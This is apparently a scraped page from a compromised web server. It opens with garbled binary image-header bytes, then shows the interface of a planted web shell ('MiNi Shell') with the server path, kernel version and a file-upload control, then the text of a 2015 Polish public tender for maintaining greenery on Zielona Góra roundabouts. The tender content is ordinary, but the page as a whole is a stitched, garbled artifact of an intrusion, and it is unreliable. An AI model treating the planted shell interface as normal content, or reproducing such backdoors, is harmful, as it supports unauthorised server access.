JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150121/14934-N-2015.html

<p class="kh_header"><b>Zielona Góra: Utrzymanie zieleni na rondach na terenie miasta Zielona Góra</b><br>
<b>Numer ogłoszenia: 14934 - 2015; data zamieszczenia: 21.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , ul. Zjednoczenia 110, 65-120 Zielona Góra, woj. lubuskie, tel. 68 322-91-86, faks 68 322-91-84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgkim.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni na rondach na terenie miasta Zielona Góra.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Zakres prac obejmuje następujące zadania:
Przedmiotem zamówienia jest kompleksowe utrzymanie zieleni na rondach miasta Zielona Góra w roku 2015, według poniższego zakresu:
B. Opis zadania (kolejność punktów zgodnie z kosztorysem ofertowym)
1. Wygrabienie liści ze skupin krzewów na rondach.
a) dwukrotne grabienie liści, na rondach wg wykazu
Lp.	lokalizacja rond
	nazwa rond	powierzchnia w m2 
1	Botaniczna, Księdza Michalskiego bez nazwy	690 
2	Botaniczna, Nowojędrzychowska	Zesłańców Sybiru	182 
3	Chrobrego, Sulechowska	Dmowskiego	227 
4	Dworcowa, Batorego	Anny Borchers	189 
5	Dworcowa, Bema, Sulechowska	Henryka Maćkowiaka	255 
6	Jagodowa, Nowa, Pileckiego	bez nazwy	89 
7	Łużycka, Wyszyńskiego	Jana Pawła II	245
8	Plac Piłsudskiego	11 Listopada	515 + 400 
9	Prosta, Działkowa, Zacisze 	Haliny Lubicz	177 
10	Ptasia, Wyszyńskiego	Anny German	270 
11	Strefa Aktywności Gospodarczej	bez nazwy	415 
	12	Szosa Kisielińska	bez nazwy	265 
13	Westerplatte, Chrobrego	Michała Kaziowa	177 
14	Woj. Polskiego, Prosta, Wyczółkowskiego	Władysława Korcza	89 
15	Wyspiańskiego, Sulechowska	Albina Bandurskiego	200 + 30 
		RAZEM:	4 415 m2
- zgrabienie liści w pryzmy, załadunek i transport, 
- nie dopuszcza się pozostawienia zgrabionych liści na rondach
b) termin prac
- wiosenne grabienie rond należy wykonać do 15 kwietnia,
- jesienne grabienie rond do 31 października,
- Zamawiający zastrzega zmianę terminu prac,
2. Grabienie trawników na rondach.
a) grabienie trawników na rondach wg wykazu:
Lp.	lokalizacja rond
	nazwa rond	powierzchnia  w m2
1	Dworcowa, Ułańska	Klema Felhnerowskiego	59 
2	Energetyków, Batorego	Edwarda Jaworskiego	401
3	Fabryczna, Ogrodowa	Romana Mazurkiewicza	32 
4	Jagodowa, Nowa, Pileckiego	bez nazwy	89 
5	Plac Piłsudskiego 	(pas rozdziału)	400
6	Sienkiewicza (przy Wydz. Komunikacji)	bez nazwy	160
7	Wiśniowa, Moniuszki, 	Nauczycieli Tajnego Nauczania	88 
8	Woj. Polskiego, Prosta, Wyczółkowskiego	Władysława Korcza	89  
9	Woj. Polskiego, Zjednoczenia	PCK	837
		RAZEM:	2 155   m 2
- zgrabienie liści w pryzmy, załadunek i transport, 
- nie dopuszcza się pozostawienia spryzmowanych liści i worków z liśćmi  na rondach,
b)   termin prac należy wykonać do 15 kwietnia 
- Zamawiający zastrzega zmianę terminu prac,
3. Obsadzenie rond kwiatami wiosennymi 25 szt./m2 z pielęgnacją.
a)  przygotowanie terenu pod nasadzenie kwiatów,
- lekkie przekopanie wyznaczonego terenu,
b)  zakup, transport i posadzenie 1 650 szt. kwiatów - bratków,
- przewidywana powierzchnia do obsadzenia 66 m 2
c)  termin prac
- sadzenie, należy wykonać do 15 kwietnia,  
d)  wykaz rond objętych nasadzeniami:
Lp.	lokalizacja rond
	nazwa rond	szt.
1	Dworcowa, Ułańska	Klema Felhnerowskiego (z koszem)	80
2	Fabryczna, Ogrodowa	Romana Mazurkiewicza	20
3	Jagodowa, Nowa, Pileckiego	bez nazwy	200
4	Plac Piłsudskiego	11 Listopada	450
5	Ptasia, Wyszyńskiego	Anny German	200
6	Westerplatte, Chrobrego	Michała Kaziowa	200
7	Wiśniowa, Moniuszki,	Nauczycieli Tajnego Nauczania	20
8	Wiśniowa, Ogrodowa	Tomasza Florkowskiego	30
9	Łużycka, Wyszyńskiego	Jana Pawła II	450
		RAZEM	1 650 szt.
e)  bieżąca pielęgnacja bratków
- podlewanie, odchwaszczanie, uszczykiwanie przekwitłych kwiatostanów, uzupełnianie skradzionych kwiatów, oraz likwidacja kwiatów po przekwitnięciu,
4. Obsadzenie rond kwiatami letnimi 20 szt./m 2, z pielęgnacją.
a)    przygotowanie terenu pod nasadzenie kwiatów letnich, 
- odchwaszczenie i lekkie przekopanie terenu wyznaczonego pod obsadzenie kwiatów,
b)   zakup, transport  i posadzenie 1 120 szt., kwiatów, 
- kwiaty letnie tj.: begonia big, begonia bulwiasta, aksamitka,
- Zamawiający zastrzega wybór odmian i kolor kwiatów, 
- kwiaty należy sadzić w równych odległościach, 
- Wykonawca wykona wzory nasadzeń kwiatowych, według podanej koncepcji przez Zamawiającego,
- przewidywana powierzchnia do obsadzenia 56 m2
- miejsce nasadzeń każdorazowo wskaże Zamawiający,
c)  wykaz rond objętych nasadzeniami,
Lp.	lokalizacja rond
	nazwa rond	szt.
1	Batorego, Energetyków 	Edwarda Jaworskiego	100
2	Dworcowa, Ułańska	Klema Felhnerowskiego (z koszem)	100
3	Fabryczna, Ogrodowa	Romana Mazurkiewicza	20
4	Jagodowa, Nowa, Pileckiego	bez nazwy	100
5	Łużycka, Wyszyńskiego	Jana Pawła II	200
6	Plac Piłsudskiego	11 Listopada	300
7	Ptasia, Wyszyńskiego	Anny German	150
8	Westerplatte, Chrobrego	Michała Kaziowa	100
9	Wiśniowa, Moniuszki,	Nauczycieli Tajnego Nauczania	20
10	Wiśniowa, Ogrodowa	Tomasza Florkowskiego	30
		RAZEM	1 120 szt.
d)  termin prac
- kwiaty letnie należy posadzić do 15 maja
- Zamawiający zastrzega zmianę terminów nasadzeń,
e)   bieżąca pielęgnacja kwiatów
- podlewanie, odchwaszczanie, uszczykiwanie przekwitłych kwiatostanów, uzupełnianie skradzionych kwiatów, oraz likwidacja kwiatów po przekwitnięciu ze zgrabieniem terenu
5. Obsadzenie rond kwiatami jesiennymi 9 szt./m2, z pielęgnacją.
a)    przygotowanie terenu pod nasadzenie kwiatów jesiennych, 
- odchwaszczenie i lekkie przekopanie terenu wyznaczonego do obsadzenie kwiatami,
b)   zakup, transport  i posadzenie kwiatów, chryzantemy 1 965 szt.,
- Zamawiający zastrzega wybór odmian i kolor kwiatów, 
- zakup, transport i posadzenie,
- kwiaty należy sadzić w równych odległościach, 
- Wykonawca wykona wzory nasadzeń kwiatowych, według podanej koncepcji przez Zamawiającego,
- przewidywana powierzchnia do obsadzenia 218 m2
- miejsce nasadzeń każdorazowo wskaże Zamawiający,
c)  wykaz rond objętych nasadzeniami,
Lp.	lokalizacja rond
	nazwa rond	szt.
1	Dworcowa, Ułańska	Klema Felhnerowskiego (z koszem)	50
2	Fabryczna, Ogrodowa	bez nazwy	5
3	Jagodowa, Nowa, Pileckiego	bez nazwy	200
4	Jana Pawła II	Jana Pawła II	300
5	Łużycka, Wyszyńskiego	Jana Pawła II	300
6	Plac Piłsudskiego	11 Listopada	300
7	Ptasia, Wyszyńskiego	Anny German	200
8	Westerplatte, Chrobrego	Michała Kaziowa	100
9	Wiśniowa, Moniuszki,	Nauczycieli Tajnego Nauczania	5
10	Wiśniowa, Ogrodowa	Tomasza Florkowskiego	5
11	Wojska Polskiego, Zjednoczenia	PCK	500
		RAZEM	1 965 szt.
d)  termin prac
- kwiaty jesienne należy posadzić do 15 października,
- Zamawiający zastrzega zmianę terminów nasadzeń,
e)   bieżąca pielęgnacja kwiatów
- podlewanie, odchwaszczanie, uszczykiwanie przekwitłych kwiatostanów, uzupełnianie skradzionych kwiatów, oraz likwidacja kwiatów po przekwitnięciu ze zgrabieniem terenu
6. Obsadzenie rond bylinami 9 szt./m2
a)  sadzenie bylin, 
     - zakup i transport liliowców, żurawek i traw
- Zamawiający zastrzega wybór odmian roślin,
- przewidywana powierzchnia do obsadzenia 200 m2
- miejsce i termin nasadzeń każdorazowo wskaże Zamawiający,
b)   bieżąca pielęgnacja bylin
- podlewanie, odchwaszczanie, zacinanie przekwitłych części bylin, okrycie bylin przed przemarznięciem
7. Obsadzenie rond roślinami cebulowymi. 
a)   zakup, transport i sadzenie cebul kwiatowych, 
- zakup, transport i posadzenie 5000 szt. cebul kwiatowych,
- miejsce nasadzeń każdorazowo wskaże Zamawiający,
- wykaz rond objętych nasadzeniami,
Lp.	lokalizacja rond
	nazwa rond	odmiana	szt. 
1	Chrobrego, Sulechowska	Dmowskiego	Szafirek armeński	100
2	Dworcowa, Batorego	Anny Borchers	Szachownica kostkowata	200
3	Dworcowa, Bema, Sulechowska	Henryka Maćkowiaka	Czosnek karatawski	100
4	Dworcowa, Ułańska	Klema Felhnerowskiego	Tulipan OrangePrincess	   100
5	Energetyków, Batorego	Edwarda Jaworskiego	Tulipan Denise	250
6	Jagodowa, Nowa, Pileckiego	bez nazwy	Tulipan	250
7	Plac Piłsudskiego	11 Listopada	Tulipan Monte Carlo	500
8	Prosta, Działkowa	Haliny Lubicz	Narcyz cyklamenowy	100
9	Ptasia, Wyszyńskiego	Anny German	Tulinap Kaczyński	100
10	Ptasia, Wyszyńskiego	Anny German	Tulipan Kaczyńska	100
11	Sienkiewicza	bez nazwy	Tulipan (fosteriana  Ballet 	200
12	Strefa Aktywności Gospodarczej	bez nazwy	Tulipan 	300
13	Szosa Kisielińska	bez nazwy	Szachownica cesarska	200
14	Westerplatte, Chrobrego	Michała Kaziowa	Czosnek błękitny	200
15	Wiśniowa, Moniuszki	Nauczycieli Tajnego Nauczania 	Tulipan	100
16	Wiśniowa, Ogrodowa	Tomasza Florkowskiego	Tulipan	100
17	Wojska Polskiego, Zjednoczenia	PCK	Krokusy mix kolor 	2000
18	Wyszyńskiego, Łużycka 	Jana Pawła II	Tulipan Jana Pawła II	100
			RAZEM:	5000 szt.
- przysypanie posadzonych cebulek ziemią ogrodniczą,
- Zamawiający zastrzega zmianę w lokalizacji i wyborze odmian cebul kwiatowych,
b)  jakość materiału
- jakość cebul kwiatowych I gatunku, cebule zdrowe, bez nalotów chorobowych, przechowywane  w odpowiednich warunkach, 
c)  termin prac
- sadzenie cebul należy wykonać do 15 października
d)   bieżąca pielęgnacja
- usuwanie przekwitłych kwiatostanów i liści z cebul sadzonych w roku ubiegłym
8. Sadzenie drzew liściastych form naturalnych, na terenie płaskim, w gruncie kat I - II
a)   zakup, transport i posadzenie drzew
- zakup i transport 6 szt. drzew - surmia bignioniowa  Catalpa bignonioides                                o obwodach 12 - 14 cm. 
- wyznaczenie miejsc na posadzenie drzew, (rondo przy ul. Botanicznej, Księdza Michalskiego),
- posadzenie drzew w doły w wymiarach 70 x 70, całkowicie zaprawione ziemią urodzajną,
- posadzenie, podlanie i wykonanie misy, 
-  opalikowanie drzew, trzema zaimpregnowanymi palikami O 50 x 50 mm  
- przymocowanie specjalistycznymi taśmami (szer. 5cm) drzewa do palików, 
- taśmy należy zamocować na jednej wysokości 1,50 m,
b)   jakość materiału
- drzewa zgodne z normą PN-R-67023 i PN-R67022, sadzonki drzew i krzewów powinny być prawidłowo uformowane z zachowaniem pokroju charakterystycznego dla gatunku i odmiany oraz posiadać następujące cechy:
- pąk szczytowy przewodnika powinien być wyraźnie wykształcony,
- przyrost ostatniego roku powinien wyraźnie i prosto przedłużać przewodnik
- system korzeniowy powinien być skupiony, prawidłowo rozwinięty, na korzeniach szkieletowych powinny występować liczne korzenie drobne,   
- bryła korzeniowa powinna być prawidłowo uformowana i nie uszkodzona,
- u roślin sadzonych z bryłą korzeniową, np. drzew i krzewów, bryła korzeniowa powinna być prawidłowo uformowana i nie uszkodzona
- pędy korony u drzew i krzewów nie powinny być przycięte, chyba że jest to cięcie formujące,
- pędy boczne korony drzew powinny być równomiernie rozmieszczone,
- przewodnik powinien być praktycznie prosty,
Wady niedopuszczalne
a) silne uszkodzenia mechaniczne,
b) odrosty podkładki poniżej miejsca szczepienia,
c) ślady żerowania szkodników,
d) oznaki chorobowe,
e) zwiędnięcie i pomarszczenie kory zarówno na częściach nadziemnych jak i na korzeniach,
f)  martwica i pęknięcia kory na przewodniku,
g) dwupędowe korony drzew formy piennej,
h) złe zrośnięcie odmiany szczepionej z podkładką.
c) pielęgnacja drzew
- podlewanie, odchwaszczanie misek, w przypadku zerwania, obluzowania taśm, lub przekrzywienia palików, Wykonawca poprawi usterkę na własny koszt,
- Wykonawca udziela trzyletniej gwarancji na posadzone drzewa, tzn. przez okres 3 lat wykonuje w/w pielęgnację, na własny koszt
9. Sadzenie krzewów liściastych form naturalnych na terenie płaskim, w gruncie kat. I - II.
a)  zakup, transport i posadzenie krzewów.
- zakup i transport 400 szt. krzewów, 
- posadzenie n/w krzewów w doły całkowicie zaprawione ziemią urodzajną,
- miejsce nasadzeń każdorazowo wskaże Zamawiający,
Lp.	nazwa polska	nazwa łacińska	szt.
1	jałowiec pośredni 	Juniperus x pfitzeriana Gold Star	70
2	żywotnik zachodni 	Thuja occidentalis Golden Globe	100
3	modrzew europejski	Larix decidua Repens	30
4	tawuła japońska	Spirea japonica Goldflame	100
5	tawuła japońska	Spirea japonica Goldmound	100
6	trzmielina Fortunea	Euonymus fortunei	100
RAZEM:	400 szt.
- Zamawiający zastrzega zmiany w doborze gatunkowym krzewów,
b)  termin prac.
- krzewy należy sadzić w okresie wczesno wiosennym do 15 kwietnia lub do 31 października
c)  jakość materiału.
 - wymagana jakość materiału w w/w punkcie 
d)   bieżąca pielęgnacja posadzonych krzewów
- podlewanie, odchwaszczanie, przycięcie w okresie jesiennym zachowujące pokrój dla danej odmiany,
10. Pielenie róż.
a)   pielenie róż.
- na pl. Piłsudskiego i rondzie Michała Kaziowa o powierzchni 400 m2 , siedem razy w sezonie,
- nie dopuszcza się pozostawienia chwastów na rondzie!
- chwasty należy zebrać  i wywieźć na miejsce utylizacji, 
11.  Pielenie.
a)  pielenie należy wykonywać wg podanego wykazu 
Lp.	lokalizacja rond
	nazwa rond	Powierzchnia w m2
1	Botaniczna, Księdza Michalskiego	bez nazwy	690 
2	Botaniczna, Nowojędrzychowska	Zesłańców Sybiru	363 
3	Chrobrego, Sulechowska	Dmowskiego	151 
4	Dworcowa, Batorego	Anny Borchers	126 
5	Dworcowa, Bema, Sulechowska	Henryka Maćkowiaka	172 
6	Jagodowa, Nowa, Pileckiego	bez nazwy	89 
7	Łużycka, Wyszyńskiego	Jana Pawła II	490
8	Plac Piłsudskiego	11 Listopada	515
9	Prosta, Działkowa, Zacisze 	Haliny Lubicz	177
10	Ptasia, Wyszyńskiego	Anny German	270
11	Strefa Aktywności Gospodarczej	bez nazwy	415
12	Szosa Kisielińska	bez nazwy	265
13	Westerplatte, Chrobrego	Michała Kaziowa	177
14	Wojska Polskiego, Prosta, Wyczółkowskiego	Władysława Korcza	89 
15	Wyspiańskiego, Sulechowska	Albina Bandurskiego	200 + 30 
16	Woj. Polskiego, Zjednoczenia	PCK	418 
RAZEM:	4 637 m2
- powierzchnia do odchwaszczania 4 637 m 2, osiem razy w sezonie 
- nie dopuszcza się pozostawienia chwastów na rondzie.
- chwasty należy zebrać i wywieźć na miejsce utylizacji,
12. Przycinanie krzewów.
a)    dwukrotne przycięcie krzewów o powierzchni 3 696 m 2, zgodnie z wykazem. 
Lp.	lokalizacja rond
	nazwa rond	Powierzchnia w m2
1	Botaniczna, Księdza Michalskiego	bez nazwy	690 
2	Botaniczna, Nowojędrzychowska	Zesłańców Sybiru	240 
3	Chrobrego, Sulechowska	Dmowskiego	113 
4	Dworcowa, Batorego	Anny Borchers	126 
5	Dworcowa, Bema, Sulechowska	Henryka Maćkowiaka	127 
6	Dworcowa, Ułańska	klema Felhnerowskiego	59 
7	Jagodowa, Nowa, Pileckiego	bez nazwy	89 
8	Łużycka, Wyszyńskiego	Jana Pawła II	245
9	Plac Piłsudskiego	11 Listopada	515 + 400
10	Prosta, Działkowa, Zacisze 	Haliny Lubicz	58 
11	Ptasia, Wyszyńskiego	Anny German	180
12	Strefa Aktywności Gospodarczej	bez nazwy	415
13	Szosa Kisielińska	bez nazwy	132
14	Westerplatte, Chrobrego	Michała Kaziowa	88 
15	Wojska Polskiego, Prosta, Wyczółkowskiego	Władysława Korcza	89 
16	Wyspiańskiego, Sulechowska	Albina Bandurskiego	100 + 30
RAZEM:	3 696 m2
- przycięcie krzewów, zebranie w stosy i transport do miejsca utylizacji,
- nie dopuszcza się pozostawienia stosów na rondach,
b)    termin i jakość prac
- pierwsze przycięcie krzewów do 15 kwietnia,
- drugie przycięcie do uzgodnienia z Zamawiającym,
- przycięcia krzewów należy dokonywać zgodnie ze sztuką ogrodniczą, zachowując pokrój dla danego gat. krzewu
13. Rozścielenie ziemi urodzajnej.
a)    zakup i transport ziemi urodzajnej 12 m3
- ziemia bez zanieczyszczeń, nie zachwaszczona,
- rozłożenie dowiezionej ziemi urodzajnej, równa warstwą o grubości 5 cm,
b)   ronda przeznaczone do pokrycia ziemi, wskaże Zamawiający 
14. Rozsypanie żwiru na grubość 5 cm.
a)   zakup agro - włókniny ogrodniczej, średniej grubości, koloru białego
- wyrównanie i zgrabienie terenu,
- równomierne rozłożenie włókniny na rondzie, wskazanym przez Zamawiającego,
- przymocowanie szpilami włókniny do gruntu,
b)   zakup i transport 10 ton żwiru
- żwir biały, frakcja 16 - 30 mm,
- równomierne rozłożenie żwiru na włókninie, na grubość 5 cm,
c)   ronda przeznaczone do pokrycia żwirem, wskaże Zamawiający
15. Wykonanie trawnika dywanowego.
a)  przygotowanie terenu
- zakup nasion trawy dostosowanych do panujących warunków,
- odchwaszczenie, oczyszczenie terenu z kamieni i wyrównanie ternu,
- równomierne wysianie nasion traw,
b)   termin prac
- wysianie trawnika należy wykonać wczesną wiosną do 30 kwietnia lub jesienią do 30 września,
c)   bieżąca pielęgnacja
- podlewanie, odchwaszczanie, 
16. Koszenie trawy na rondach.
a)   koszenie wg wykazu
Lp.	lokalizacja rond
	nazwa rond	powierzchnia w m 2
1	Batorego, Energetyków	Edwarda Jaworskiego	401 
2	Botaniczna, Nowojędrzychowska	Zesłańców Sybiru	180 
3	Dworcowa, Ułańska	Klema Felhnerowskiego	59 
4	Jagodowa, Nowa, Pileckiego	bez nazwy	89 
5	Jaskółcza, Ogrodowa	Tomasza Florkowskiego	72 
6	Ogrodowa, Fabryczna	bez nazwy 	32 
7	Plac Piłsudskiego	Plac Piłsudskiego	400
8	Sienkiewicza	bez nazwy	160
9	Wiśniowa, Jaskółcza	Nauczycieli Tajnego Nauczania	88 
10	Woj. Pol. Zjednoczenia	PCK	837
11	Wojska polskiego, Prosta	Władysław Korcza	89 
RAZEM :	2 407 m2
Zamawiający ustala że, wysokość koszonej trawy oraz innych roślin (chwastów) na trawnikach, nie może przekraczać 12 cm. Wymaganą wysokość koszonej trawy należy utrzymać przez cały okres wegetacyjny.  
- skoszona trawę należy zgrabić, zebrać i wywieźć,
b)   termin prac
- koszenie od 15 kwietnia do 31października,
17. Opryski środkami chwastobójczymi.
a)   opryski środkami chwastobójczymi  - pierścieni przy rondach
- przewidywana powierzchnia do oprysków 5 000 m2
- opryski należy wykonać na uprzednio zmiecioną powierzchnię,
- używany środek chwastobójczy powinien być dopuszczony do obrotu, 
- opryski będą wykonywane w zależności od potrzeby, na zlecenie Zamawiającego 
18. Wykonanie osłon przeciw przemarzaniu, wokół drzew.
a)   zakup, transport materiałów i wykonanie osłon przy 21 drzewach,
- zakup, transport materiałów - folia 0,5 mm, mata wiklinowa,
- zamontowanie osłon przy drzewach, z folii i wikliny, o wys. 1,20 m., 
- osłony wykonać stabilnie i solidnie,
- Wykonawca zobowiąże się do naprawy usterek, powstałych w okresie zimowym, na własny koszt,
19. Podlewanie.
a) podlewanie w sposób utrzymujący optymalną wilgotność dla wszystkich roślin na rondach, nie należy dopuszczać do nadmiernego przesuszenia ziemi w wieży kwiatowej  i małych donicach na rondach,
 b) Zamawiający zastrzega, o każdorazowym poinformowaniu telefonicznym, (sms) które ronda zostały podlane.
Koszty zużytej wody pokrywa Zamawiający. 
20. Zamiatanie.
Utrzymanie opasek przy rondach w czystości tj. zamiatanie piasku i innych drobnych nieczystości,                    z częstotliwością dwa razy w miesiącu. Przewidywana powierzchnia do zamiatania 4 000 m 2. 
21. Nawożenie roślin.
Nawożenie roślin w okresie wczesno wiosennym, nawozem wieloskładnikowym granulowanym nie szkodliwym dla środowiska i zwierząt posiadającym bieżące atesty i kartę charakterystyki produktu. Zamawiający ustali termin nawożenia roślin.  Przewidywana powierzchnia do nawożenia 4 900 m 2.
Koszty zakupu nawozu, pokrywa Wykonawca. 
22. Zakup 2 donic, z transportem na rondo Edwarda Jaworskiego. 
a) wymagania techniczne donic:
materiał, polietylen odporny na uszkodzenia mechaniczne i promienie UV, donice na okrągłej podstawie, rozszerzane ku górze, donice z przeznaczeniem do aranżacji przestrzennej. 
 donica  1: O 1130, h 940, poj. 500 l., waga 24 kg.
 donica 2: O 920, h 770, poj. 270 l., waga 16 kg.
- dopuszcza się różnice w wymiarach donic do 10 cm,
- kolor donic ciemny żółty,
b) termin ustawienia donic do 15 maja
- donice należy zakupić do końca kwietnia (uwzględnić czas oczekiwani na donice)
- zakup donic powinien być zaakceptowany przez Zamawiającego, przed zakupem
- wygląd donicy w załączniku nr 1
WYKAZ ROND 
Lp.	lokalizacja rond
	nazwa rond	powierzchnia w m2
1	Batorego, Energetyków	Edwarda Jaworskiego	401 
2	Botaniczna, Księdza Michalskiego	bez nazwy	690 
3	Botaniczna, Nowojędrzychowska	Zesłańców Sybiru	362 
4	Chrobrego, Sulechowska	Dmowskiego	226 
5	Dworcowa, Batorego	Anny Borchers	189 
6	Dworcowa, Bema, Sulechowska	Henryka Maćkowiaka	255 
7	Dworcowa, Ułańska	Klema Felhnerowskiego	118 
8	Funka, Wierzbowa 	bez nazwy	60 
9	Jagodowa, Nowa, Pileckiego	bez nazwy	177
10	Jaskółcza, Ogrodowa	Tomasza Florkowskiego	143
11	Jaskółcza, Wiśniowa	Nauczycieli Tajnego Nauczania	176
12	Łużycka, Wyszyńskiego	Jana Pawła II	490
13	Ogrodowa, Fabryczna	bez nazwy 	63 
14	Plac Piłsudskiego	11 Listopada	515 + 400
15	Prosta, Działkowa, Zacisze 	Haliny Lubicz	176 
16	Ptasia, Wyszyńskiego	Anny German	279 
17	Sienkiewicza 	bez nazwy	160 
18	Strefa Aktywności Gospodarczej	bez nazwy	415 
19	Szosa Kisielińska	bez nazwy	265 
20	Westerplatte, Chrobrego	Michała Kaziowa	177 + 30 
21	Wojska Polskiego, Prosta, Wyczółkowskiego	Władysława Korcza	89 
22	Wyspiańskiego, Sulechowska	Albina Bandurskiego	200 + 30 
23	Zjednoczenia, Wojska Polskiego 	PCK	1256 
RAZEM :	7 342 m2
C. Obowiązki Wykonawcy:
